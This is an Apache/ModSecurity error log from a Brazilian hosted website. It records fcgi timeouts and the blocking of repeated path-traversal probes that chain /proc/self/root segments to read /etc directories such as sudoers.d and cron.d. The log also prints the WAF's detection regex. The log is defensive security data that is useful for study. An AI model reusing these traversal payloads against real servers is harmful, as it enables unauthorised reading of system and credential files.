[Tue Mar 17 17:25:25.122020 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:25:47.121795 2026] [proxy_fcgi:error] [pid 25836:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:26:09.033803 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35694] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:26:38.037545 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:27:00.069878 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:27:01.200230 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.241.31:59540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5FXIk7brgkOH-rIWg6gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:27:29.021822 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36822] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:27:44.198483 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:45712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5P9Y0UrI5A3LftIwRsQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:27:51.128218 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:28:15.125913 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:28:20.087385 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:37856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5ZKBJNF7axNlVR0UtDwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:28:21.548288 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:56802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5Zda6ubjKNq_cu4YcVwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:28:24.255674 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:56804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5aAeiSKl8TjouI-YsNgAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:28:25.983325 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:56806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5aQeiSKl8TjouI-YsNwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:28:28.895939 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:57934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5bMU6Sx0TG1YjmQjCvAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:28:29.355830 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.243.128:56440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5bYh-PF_25v4hFRB_JwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:28:34.687554 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:57948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5cgeiSKl8TjouI-YsPgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:28:37.127548 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:28:39.165182 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:57956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5d9a6ubjKNq_cu4YcYAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:28:59.129810 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37866] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:29:18.929955 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.243.128:60812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5nhj0p0SRWAqcjGGOIAAAAwo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:29:21.110102 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38036] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:29:31.661060 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:60812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5qxj0p0SRWAqcjGGOJAAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:29:43.131150 2026] [proxy_fcgi:error] [pid 7004:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:29:46.340426 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.244.43:35926] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm5uqBJNF7axNlVR0UtIAAAAAU"]
[Tue Mar 17 17:29:57.371505 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:45262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5xcU6Sx0TG1YjmQjC2wAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:29:57.868914 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.228.61:57642] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm5xaBJNF7axNlVR0UtJwAAABc"]
[Tue Mar 17 17:29:59.053994 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.241.31:34822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm5x8U6Sx0TG1YjmQjC3AAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:30:05.045880 2026] [proxy_fcgi:error] [pid 7004:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:30:05.269998 2026] [core:alert] [pid 2598:tid 140411590858496] [client 74.7.241.31:34826] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root
[Tue Mar 17 17:30:27.139376 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38588] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:30:49.131483 2026] [proxy_fcgi:error] [pid 7437:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38758] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:31:11.129863 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38922] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:31:33.045923 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39120] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:31:59.057820 2026] [proxy_fcgi:error] [pid 29151:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:32:23.129775 2026] [proxy_fcgi:error] [pid 29151:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39540] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:32:52.121280 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:33:13.125837 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39994] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:33:18.124037 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:34842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm6jnIk7brgkOH-rIWhQwAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:33:38.129836 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:34:00.133767 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40732] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:34:22.124813 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:34:23.236314 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:53606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm6z_PqhzTj3BvfDX-cQgAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:34:25.802298 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:40486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm60XIk7brgkOH-rIWhUQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:34:43.125324 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41264] AH01075: Error dispatching request to : (polling)
